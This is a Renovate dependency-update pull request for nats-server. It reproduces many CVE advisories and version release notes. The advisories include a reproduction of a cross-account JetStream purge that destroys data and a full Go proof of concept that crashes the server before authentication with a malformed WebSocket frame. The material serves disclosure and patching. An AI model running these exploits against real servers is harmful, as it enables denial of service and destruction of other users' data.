Skip to content

test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security]#76

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability
Open

test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security]#76
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Apr 15, 2025

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
github.com/nats-io/nats-server/v2 v2.10.17v2.11.15 age confidence

GitHub Vulnerability Alerts

CVE-2025-30215

Advisory

The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.

Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.

Affected versions

NATS Server:

  • Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27

Original Report

(Lightly edited to confirm some supposition and in the summary to use past tense)

Summary

nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.

In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.

Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.

Reproduction of the ACCOUNT.PURGE case is below. The others are like it.

Details & Impact

Issue 1: $JS.API.ACCOUNT.PURGE.*

Any user may perform an account purge of any other account (including their own).

Risk: total destruction of Jetstream configuration and data.

Issue 2: $JS.API.SERVER.REMOVE

Any user may remove servers from Jetstream clusters.

Risk: Loss of data redundancy, reduction of service quality.

Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE

Any user may cause streams to be moved between servers.

Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.

Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*

Mitigations

It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.

Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.

Scope of impact

Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All 3 allow system level access to non-system account users.

While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.

Additional notes

It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.

PoC

Environment

Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4

Reproduction steps

$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS': {
    users: [{user: 'sys', password: 'sys'}]
  },
  'TEST': {
    jetstream: true,
    users: [{user: 'a', password: 'a'}]
  },
  'TEST2': {
    jetstream: true,
    users: [{user: 'b', password: 'b'}]
  }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

# Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

# Valid credentials work, and users properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
                      User: sys
                   Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
                           User: a
                        Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
                           User: b
                        Account: TEST2
...

# Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg "
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

# Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭───────────────────────────────────────────────────────────────────────────────╮
│                                    Streams                                    │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B	tmp/jetstream/TEST/streams/stream1/obs
8.0K	tmp/jetstream/TEST/streams/stream1/msgs
 16K	tmp/jetstream/TEST/streams/stream1
 16K	tmp/jetstream/TEST/streams
 16K	tmp/jetstream/TEST
 16K	tmp/jetstream

# User b (account TEST2) sends a PURGE command for account TEST (user a).

# According to the source comments, user b shouldn't even be able to purge it's own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

# From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

# And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B	tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined

CVE-2026-27571

Impact

The WebSockets handling of NATS messages handles compressed messages via the WebSockets negotiated compression. The implementation bound the memory size of a NATS message but did not independently bound the memory consumption of the memory stream when constructing a NATS message which might then fail validation for size reasons.

An attacker can use a compression bomb to cause excessive memory consumption, often resulting in the operating system terminating the server process.

The use of compression is negotiated before authentication, so this does not require valid NATS credentials to exploit.

The fix was to bounds the decompression to fail once the message was too large, instead of continuing on.

Patches

This was released in nats-server without being highlighted as a security issue. It should have been, this was an oversight. Per the NATS security policy, because this does not require a valid user, it is CVE-worthy.

This was fixed in the v2.11 series with v2.11.12 and in the v2.12 series with v2.12.3.

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points.

References

This was reported to the NATS maintainers by Pavel Kohout of Aisle Research (www.aisle.com).

CVE-2026-33247

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an optional monitoring port, which provides access to sensitive data. The nats-server can take certain configuration options on the command-line instead of requiring a configuration file.

Problem Description

If a nats-server is run with static credentials for all clients provided via argv (the command-line), then those credentials are visible to any user who can see the monitoring port, if that too is enabled.

The /debug/vars end-point contains an unredacted copy of argv.

Patches

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

The NATS Maintainers are bemused at the concept of someone deploying a real configuration using --pass to avoid a config file, but also enabling monitoring.

Configure credentials inside a configuration file instead of via argv.

Do not enable the monitoring port if using secrets in argv.

Best practice remains to not expose the monitoring port to the Internet, or to untrusted network sources.

CVE-2026-29785

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When configured to accept leafnode connections (for a hub/spoke topology of multiple nats-servers), then the default configuration allows for negotiating compression; a malicious remote NATS server can trigger a server panic via that compression.

Problem Description

If the nats-server has the "leafnode" configuration enabled (not default), then anyone who can connect can crash the nats-server by triggering a panic. This happens pre-authentication and requires that compression be enabled (which it is, by default, when leafnodes are used).

Context: a NATS server can form various clustering topologies, including local clusters, and superclusters of clusters, but leafnodes allow for separate administrative domains to link together with limited data communication; eg, a server in a moving vehicle might use a local leafnode for agents to connect to, and sync up to a central service as and when available. The leafnode configuration here is where the central server allows other NATS servers to connect into it, almost like regular NATS clients. Documentation examples typically use port 7422 for leafnode communications.

Affected Versions

Version 2, prior to v2.11.14 or v2.12.5

Workarounds

Disable compression on the leafnode port:

leafnodes {
  port: 7422
  compression: off
}

CVE-2026-33215

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

Sessions and Messages can by hijacked via MQTT Client ID malfeasance.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Resources

CVE-2026-33216

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

For MQTT deployments using usercodes/passwords: MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via monitoring endpoints.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Ensure monitoring end-points are adequately secured.

Best practice remains to not expose the monitoring endpoint to the Internet or other untrusted network users.

CVE-2026-33217

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

When using ACLs on message subjects, these ACLs were not applied in the $MQTT.> namespace, allowing MQTT clients to bypass ACL checks for MQTT subjects.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

CVE-2026-33218

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers.

Problem Description

A client which can connect to the leafnode port can crash the nats-server with a certain malformed message pre-authentication.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

  1. Disable leafnode support if not needed.
  2. Restrict network connections to your leafnode port, if plausible without compromising the service offered.

References

CVE-2026-33219

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a WebSockets client service, used in deployments where browsers are the NATS clients.

Problem Description

A malicious client which can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data.

This is a milder variant of NATS-advisory-ID 2026-02 (aka CVE-2026-27571; GHSA-qrvq-68c2-7grw).
That earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Disable websockets if not required for project deployment.

CVE-2026-33222

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The persistent storage feature, JetStream, has a management API which has many features, amongst which are backup and restore.

Problem Description

Users with JetStream admin API access to restore one stream could restore to other stream names, impacting data which should have been protected against them.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

If developers have configured users to have limited JetStream restore permissions, temporarily remove those permissions.

CVE-2026-33223

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a Nats-Request-Info: message header, providing information about a request.

Problem Description

The NATS message header Nats-Request-Info: is supposed to be a guarantee of identity by the NATS server, but the stripping of this header from inbound messages was not fully effective.

An attacker with valid credentials for any regular client interface could thus spoof their identity to services which rely upon this header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

CVE-2026-33246

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers. NATS messages can have headers.

Problem Description

The nats-server offers a Nats-Request-Info: message header, providing information about a request. This is supposed to provide enough information to allow for account/user identification, such that NATS clients could make their own decisions on how to trust a message, provided that they trust the nats-server as a broker.

A leafnode connecting to a nats-server is not fully trusted unless the system account is bridged too. Thus identity claims should not have propagated unchecked.

Thus NATS clients relying upon the Nats-Request-Info: header could be spoofed.

Does not directly affect the nats-server itself, but the CVSS Confidentiality and Integrity scores are based upon what a hypothetical client might choose to do with this NATS header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

CVE-2026-33248

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

One authentication model supported is mTLS, deriving the NATS client identity from properties of the TLS Client Certificate.

Problem Description

When using mTLS for client identity, with verify_and_map to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass.

This does require a valid certificate from a CA already trusted for client certificates, and DN naming patterns which the NATS maintainers consider highly unlikely.

So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their DN construction patterns might conceivably be impacted.

Affected Versions

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

Developers should review their CA issuing practices.

CVE-2026-27889

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When using WebSockets, a malicious client can trigger a server crash with crafted frames, before authentication.

Problem Description

A missing sanity check on a WebSockets frame could trigger a server panic in the nats-server. This happens before authentication, and so is exposed to anyone who can connect to the websockets port.

Affected versions

Version 2 from v2.2.0 onwards, prior to v2.11.14 or v2.12.5

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points. If able to do so, a defense in depth of restricting either of these will mitigate the attack.

Solution

Upgrade the NATS server to a fixed version.

Credits

This was reported to the NATS maintainers by GitHub user Mistz1.
Also independently reported by GitHub user jiayuqi7813.


Report by @​Mistz1

Summary

An unauthenticated remote attacker can crash the entire nats-server process by sending a single malicious WebSocket frame (15 bytes after the HTTP upgrade handshake). The server fails to validate the RFC 6455 §5.2 requirement that the most significant bit of a 64-bit extended payload length must be zero. The resulting uint64int conversion produces a negative value, which bypasses the bounds clamp and triggers an unrecovered panic in the connection's goroutine — killing the entire server process and disconnecting all clients. This affects all platforms (64-bit and 32-bit).

Details

Vulnerable code: server/websocket.go line 278

r.rem = int(binary.BigEndian.Uint64(tmpBuf))

When a WebSocket frame uses the 64-bit extended payload length (length code 127), the server reads 8 bytes and casts the raw uint64 directly to int with no validation. RFC 6455 §5.2 states: "the most significant bit MUST be 0" — but nats-server never checks this.

Attack chain:

  1. The attacker sends a WebSocket frame with the MSB set in the 64-bit length field (e.g., 0x8000000000000001).

  2. At line 278, int(0x8000000000000001) produces -9223372036854775807 on 64-bit Go (two's complement reinterpretation — Go does not panic on integer conversion overflow).

  3. r.rem is now negative. At line 307–311, the bounds clamp fails:

    n = r.rem                    // n = -9223372036854775807
    if pos+n > max {             // 14 + (-huge) = negative, NOT > max → FALSE
        n = max - pos            // clamp NEVER fires
    }
    b = buf[pos : pos+n]         // buf[14 : -9223372036854775793] → PANIC

    The addition pos + n wraps to a negative value (Go signed integer overflow is defined behavior — it wraps silently). Since the negative result is never greater than max, the clamp is skipped. The slice expression at line 311 reaches the Go runtime bounds check, which panics.

  4. There is no defer recover() anywhere in the goroutine chain:

    The unrecovered panic propagates to Go's runtime, which calls os.Exit(2). The entire nats-server process terminates.

  5. The WebSocket frame is parsed in wsRead() called from readLoop(), which starts immediately after the HTTP upgrade — before any NATS CONNECT authentication. No credentials are required.

Why 15 bytes, not 14: The 14-byte frame header (opcode + length + mask key) exactly fills the read buffer on the first call, so pos == max and the payload loop at line 303 (if pos < max) is skipped. The poisoned r.rem persists in the wsReadInfo struct. One additional byte of "payload" is needed so that pos < max on either the same or next read, entering the panic path at line 311.

PoC

Server configuration (test-ws.conf):

listen: 127.0.0.1:4222

websocket {
    listen: "127.0.0.1:9222"
    no_tls: true
}

Start the server:

nats-server -c test-ws.conf

Exploit (poc_ws_crash.go):

package main

import (
	"bufio"
	"encoding/binary"
	"fmt"
	"net"
	"net/http"
	"os"
	"time"
)

func main() {
	target := "127.0.0.1:9222"
	if len(os.Args) > 1 {
		target = os.Args[1]
	}

	fmt.Printf("[*] Connecting to %s...\n", target)
	conn, err := net.DialTimeout("tcp", target, 5*time.Second)
	if err != nil {
		fmt.Printf("[-] Connection failed: %v\n", err)
		os.Exit(1)
	}
	defer conn.Close()

	// WebSocket upgrade
	req, _ := http.NewRequest("GET", "http://"+target, nil)
	req.Header.Set("Upgrade", "websocket")
	req.Header.Set("Connection", "Upgrade")
	req.Header.Set("Sec-WebSocket-Key", "dGhlIHNhbXBsZSBub25jZQ==")
	req.Header.Set("Sec-WebSocket-Version", "13")
	req.Header.Set("Sec-WebSocket-Protocol", "nats")
	req.Write(conn)

	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	resp, err := http.ReadResponse(bufio.NewReader(conn), req)
	if err != nil || resp.StatusCode != 101 {
		fmt.Printf("[-] Upgrade failed\n")
		os.Exit(1)
	}
	fmt.Println("[+] WebSocket established")
	conn.SetReadDeadline(time.Time{})

	// Malicious frame: FIN+Binary, MASK+127, 8-byte length with MSB set, mask key, 1 payload byte
	frame := make([]byte, 15)
	frame[0] = 0x82                                             // FIN + Binary
	frame[1] = 0xFF                                             // MASK + 127 (64-bit length)
	binary.BigEndian.PutUint64(frame[2:10], 0x8000000000000001) // MSB set
	frame[10] = 0xDE                                            // Mask key
	frame[11] = 0xAD
	frame[12] = 0xBE
	frame[13] = 0xEF
	frame[14] = 0x41                                            // 1 payload byte

	fmt.Printf("[*] Sending: %x\n", frame)
	conn.Write(frame)

	time.Sleep(2 * time.Second)

	// Verify crash
	conn2, err := net.DialTimeout("tcp", target, 3*time.Second)
	if err != nil {
		fmt.Println("[!!!] SERVER IS DOWN — full process crash confirmed")
		os.Exit(0)
	}
	conn2.Close()
	fmt.Println("[-] Server still running")
}

Run:

go build -o poc_ws_crash poc_ws_crash.go
./poc_ws_crash

Observed server output before termination:

panic: runtime error: slice bounds out of range [:-9223372036854775793]

goroutine 13 [running]:
github.com/nats-io/nats-server/v2/server.(*client).wsRead(...)
        server/websocket.go:311 +0xa93
github.com/nats-io/nats-server/v2/server.(*client).readLoop(...)
        server/client.go:1434 +0x768
github.com/nats-io/nats-server/v2/server.(*Server).startGoRoutine.func1()
        server/server.go:4078 +0x32

Tested against: nats-server v2.14.0-dev (commit a69f51f), Go 1.25.7, linux/amd64.

Impact

Vulnerability type: Pre-authentication remote denial of service (full process crash).

Who is impacted: Any nats-server deployment with WebSocket listeners enabled (websocket { ... } in config), including MQTT-over-WebSocket. This is an increasingly common configuration for browser-based and IoT clients. The attacker needs only TCP access to the WebSocket port — no credentials, no valid NATS client, no TLS client certificate.

Severity: A single unauthenticated TCP connection sending 15 bytes crashes the entire server process. All connected clients (NATS, WebSocket, MQTT, cluster routes, gateways, leaf nodes) are immediately disconnected. JetStream in-flight acknowledgments are lost and Raft consensus is disrupted in clustered deployments. The attack is repeatable on every server restart.

Affected platforms: All — confirmed on 64-bit (linux/amd64); 32-bit platforms (linux/386, linux/arm) are also affected with additional frame-desync consequences.

( NATS retains the original external report below the cut, with exploit details.
This issue was also independently reported by GitHub user @​jiayuqi7813 before publication; they provided a Python exploit.)


Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.11.15

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.25.8
Dependencies
  • golang.org/x/crypto v0.49.0 (#​7953)
  • github.com/nats-io/jwt/v2 v2.8.1 (#​7960)
  • github.com/antithesishq/antithesis-sdk-go v0.6.0-default-no-op
  • github.com/klauspost/compress v1.18.4
  • github.com/nats-io/nats.go v1.49.0
  • github.com/nats-io/nkeys v0.4.15
CVEs
Improved

JetStream

  • The stream peer-remove command now accepts a peer ID as well as a server name (#​7952)

MQTT

  • Protocol compliance has been improved, including more error handling on invalid or malformed MQTT packets (#​7933)
Fixed

General

  • Improved handling of duplicate headers
  • A correctness bug when validating relative distinguished names has been fixed
  • Secrets are now redacted correctly in trace logging (#​7942)
  • The expvar endpoint on the monitoring port now correctly redacts secrets from the command line arguments
  • Trace headers are no longer incorrectly parsed when hitting max payload (#​7954)
  • The Nats-Trace-Dest message header for message tracing now requires that the client have publish permissions to the specified subject, an error is returned otherwise

JetStream

  • A panic when paginating on various JetStream API endpoints has been fixed
  • An interior path traversal bug that could occur when purging JetStream accounts has been fixed
  • Meta snapshot apply errors are now surfaced correctly so that the cluster monitor does not advance the applied index (#​7944)
  • Fixed an issue where extremely large JetStream reservations could overflow and violate tier limits
  • Stream restores now ensure that the stream name in the restore subject matches that of the restored snapshot archive
  • Stream ingest now correctly strips a NATS status header if present, avoiding incorrect classification of sourced or mirrored messages as control traffic
  • Stream sourcing now works correctly when sourcing into a stream with the Discard New Per Subject discard policy (#​7896)

Leafnodes

  • A panic when receiving a loop detection error before a connect message has been fixed
  • Messages from leafnodes to non-shared service imports now correctly rebuild the request info header
  • Leafnodes will now back off on receiving a minimum version required error, no longer requiring blocking the readloop (#​7970)

MQTT

  • SUB and UNSUB packets now correctly detect and reject the Packet Identifier being set to 0 (#​7805)
  • A panic that could occur when processing invalid fixed32 or fixed64 fields has been fixed (#​7941)
  • Persisted MQTT sessions can no longer be restored by a non-matching client ID
  • Restrict the implicit permissions for MQTT clients to $MQTT.sub. and $MQTT.deliver.pubrel. prefixes
  • MQTT password are no longer exposed in the JWT field of monitoring endpoints or advisory messages
  • NATS special characters (., >, *, spaces, tabs) are no longer permitted in MQTT client IDs
  • MQTT session flapping detection now uses monotonic time, fixing cases where it could be sensitive to NTP adjustments or clock drifts

WebSockets

  • WebSocket protocol parsing no longer relies on potentially unbounded in-memory allocations from compressed or uncompressed frames
Complete Changes

v2.11.14

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.25.8
Dependencies
CVEs
Fixed

Leafnodes

  • Receiving a leafnode subscription before negotiating compression should no longer result in a server panic

WebSockets

  • Fix invalid parsing of 64-bit payload lengths, which could lead to a server panic
  • Correctly reject compressed frames when compression was not negotiated as a part of the handshake
  • The Origin header validation now validates the protocol scheme as well as host and port
  • Gracefully handle failed connection upgrades
  • The CLOSE frame lengths and status codes are now validated correctly
  • The compressor state is correctly reset when a max payload error occurs
  • Empty compressed buffers should no longer result in a server panic
Complete Changes

v2.11.12

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
  • github.com/nats-io/nkeys v0.4.12 (#​7578)
  • github.com/antithesishq/antithesis-sdk-go v0.5.0-default-no-op (#​7604)
  • github.com/klauspost/compress v1.18.3 (#​7736)
  • golang.org/x/crypto v0.47.0 (#​7736)
  • golang.org/x/sys v0.40.0 (#​7736)
  • github.com/google/go-tpm v0.9.8 (#​7696)
  • github.com/nats-io/nats.go v1.48.0 (#​7696)
Added

General

  • Added WebSocket-specific ping interval configuration with ping_internal in the websocket block (#​7614)

Monitoring

  • Added tls_cert_not_after to the varz monitoring endpoint for showing when TLS certificates are due to expire (#​7709)
Improved

JetStream

  • The scan for the last sourced message sequence when setting up a subject-filtered source is now considerably faster (#​7553)
  • Consumer interest checks on interest-based streams are now significantly faster when there are large gaps in interest (#​7656)
  • Creating consumer file stores no longer contends on the stream lock, improving consumer create performance on heavily loaded streams (#​7700)
  • Recalculating num pending with updated filter subjects no longer gathers and sorts the subject filter list twice (#​7772)
  • Switching to interest-based retention will now remove no-interest messages from the head of the stream (#​7766)

MQTT

  • Retained messages will now work correctly even when sourced from a different account and has a subject transform (#​7636)
Fixed

General

  • WebSocket connections will now correctly limit the buffer size during decompression (#​7625, thanks to Pavel Kokout at Aisle Research)
  • The config parser now correctly detects and errors on self-referencing environment variables (#​7737)
  • Internal functions for handling headers should no longer corrupt message bodies if appended (#​7752)

JetStream

  • A protocol error caused by an invalid transform of acknowledgement reply subjects when originating from a gateway connection has been fixed (#​7579)
  • The meta layer will now only respond to peer remove requests after quorum has been reached (#​7581)
  • Invalid subject filters containing non-terminating full wildcard no longer produce unexpected matches (#​7585)
  • A data race when creating a stream in clustered mode has been fixed (#​7586)
  • A panic when processing snapshots with missing nodes or assignments has been fixed (#​7588)
  • When purging whole message blocks, the subject tracking and scheduled messages are now updated correctly (#​7593)
  • The filestore will no longer unexpectedly lose writes when AsyncFlush is enabled after a process pause (#​7594)
  • The filestore now will process message removal on disk before updating accounting, which improves error handling (#​7595, #​7601)
  • Raft will no longer allow peer-removing the one remaining peer (#​7610)
  • A data race has been fixed in the stream health check (#​7619)
  • Tombstones are now correctly written for recovering the sequences after compacting or purging an almost-empty stream to seq 2 (#​7627)
  • Combining skip sequences and compactions will no longer overwrite the block at the wrong offset, correcting a corrupt record state error (#​7627)
  • Compactions that reclaim over half of the available space now use an atomic write to avoid losing messages if killed (#​7627)
  • Filestore compaction should no longer result in no idx present cache errors (#​7634)
  • Filestore compaction now correctly adjusts the high and low sequences for a message block, as well as cleaning up the deletion map accordingly (#​7634)
  • Potential stream desyncs that could happen during stream snapshotting have been fixed (#​7655)
  • Raft will no longer allow multiple membership changes to take place concurrently (#​7565, #​7609)
  • Raft will no longer count responses from peer-removed nodes towards quorum (#​7589)
  • Raft quorum counting has been refactored so the implicit leader ack is now only counted if still a part of the membership (#​7600)
  • Raft now writes the peer state immediately when handling a peer-remove to ensure the removed peers cannot unexpectedly reappear after a restart (#​7602)
  • Raft will no longer allow peer-removing the one remaining peer (#​7610)
  • Add peer operations to Raft can no longer result in disjoint majorities (#​7632)
  • Raft groups should no longer readmit a previously removed peer if a heartbeat occurs between the peer removal and the leadership transfer (#​7649)
  • Raft single node elections now transition into leader state correctly (#​7642)
  • R1 streams will no longer incorrectly drift last sequence when exceeding limits (#​7658)
  • Deleted streams are no longer wrongfully revived if stalled on an upper-layer catchup (#​7668)
  • A panic that could happen when receiving a shutdown signal while JetStream is still starting up has been fixed (#​7683)
  • JetStream usage stats now correctly reflect purged whole blocks when optimising large purges (#​7685)
  • Recovering JetStream encryption keys now happens independently of the stream index recovery, fixing some cases where the key could be reset unexpectedly if the index is rebuilt (#​7678)
  • Non-replicated file-based consumers now detect corrupted state on disk and are deleted automatically (#​7691)
  • Raft no longer allows a repeat vote for the same term after a stepdown or leadership transfer (#​7698)
  • Replicated consumers are no longer incorrectly deleted if they become leader just as JetStream is about to shut down (#​7699)
  • Fixed an issue where a single truncated block could prevent storing new messages in the filestore (#​7704)
  • Fixed a concurrent map iteration/write panic that could occur on WorkQueue streams during partitioning (#​7708)
  • Fixed a deadlock that could occur on shutdown when adding streams (#​7710)
  • A data race on mirror consumers has been fixed (#​7716)
  • JetStream no longer leaks subscriptions in a cluster when a stream import/export is set up that overlaps the $JS.> namespace (#​7720)
  • The filestore will no longer waste CPU time rebuilding subject state for WALs (#​7721)
  • Configuring cluster_traffic in config mode has been fixed (#​7723)
  • Subject intersection no longer misses certain subjects with specific patterns of overlapping filters, which could affect consumers, num pending calculations etc (#​7728, #​7741, #​7744, #​7745)
  • Multi-filtered next message lookups in the filestore can now skip blocks when faster to do so (#​7750)
  • The binary search for start times now handles deleted messages correctly (#​7751)
  • Consumer updates will now only recalculate num pending when the filter subjects are changed (#​7753)
  • Consumers on replicated interest or workqueue streams should no longer lose interest or cause desyncs after having their filter subjects updated (#​7773)
  • Interest-based streams will no longer start more check interest state goroutines when there are existing running ones (#​7769)

MQTT

  • The maximum payload size is now correctly enforced for MQTT clients (#​7555, thanks to @​yixianOu)
  • Fixed a panic that could occur when reloading config if the user did not have permission to access retained messages (#​7596)
  • Fixed account mapping for JetStream API requests when traversing non-JetStream-enabled servers (#​7598)
  • QoS0 messages are now mapped correctly across account imports/exports with subject mappings (#​7605)
  • Loading retained messages no longer fails after restarting due to last sequence checks (#​7616)
  • A bug which could corrupt retained messages in clustered deployments has been fixed (#​7622)
  • Permissions to $MQTT. subscriptions are now handled implicitly, with the exception of deny ACLs which still permit restriction (#​7637)
  • A bug where QoS2 messages could not be retrieved after a server restart has been fixed (#​7643)
Complete Changes

v2.11.11

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Added

JetStream

  • Added meta_compact and meta_compact_size, advanced JetStream config options to control how many log entries must be present in the metalayer log before snapshotting and compaction takes place (#​7484, #​7521)
  • Added write_timeout option for clients, routes, gateways and leafnodes which controls the behaviour on reaching the write_deadline, values can be default, retry or close (#​7513)

Monitoring

  • Meta cluster snapshot statistics have been added to the /jsz endpoint (#​7524)
  • The /jsz endpoint can now show direct consumers with the direct-consumers?true flag (#​7543)
Improved

General

  • Binary stream snapshots are now preferred by default for nodes on new route connections (#​7479)
  • Reduced allocations in the sublist and subject transforms (#​7519)

JetStream

  • Improved the logging for observer mode (#​7433)
  • Improved the performance of enforcing max_bytes and max_msgs limits (#​7455)
  • Streams and consumers will no longer unnecessarily snapshot when being removed or scaling down (#​7495)
  • Streams are now loaded in parallel when enabling JetStream, often reducing the time it takes to start up the server (#​7482)
  • Stream catchups will now use delete ranges more aggressively, speeding up catchups of large streams with many interior deletes (#​7512)
  • Streams with subject transforms can now implicitly republish based on those transforms by configuring > for both republish source and destination (#​7515)
  • A race condition where subscriptions may not be set up before catchup requests are sent after a leader change has been fixed (#​7518)
  • JetStream recovery parallelism now matches the I/O gated semaphore (#​7526)
  • Reduced heap allocations in hash checks (#​7539)
  • Healthchecks now correctly report when streams are catching up, instead of showing them as unhealthy (#​7535)
  • Improve interest detection when consumers are created or deleted across different servers (#​7440)

Monitoring

  • The jsz monitoring endpoint can now report leader counts (#​7429)
Fixed

General

  • When using message tracing, header corruption when setting the hop header has been fixed (#​7443)
  • Shutting down a server using lame-duck mode should no longer result in max connection exceeded errors (#​7527)

JetStream

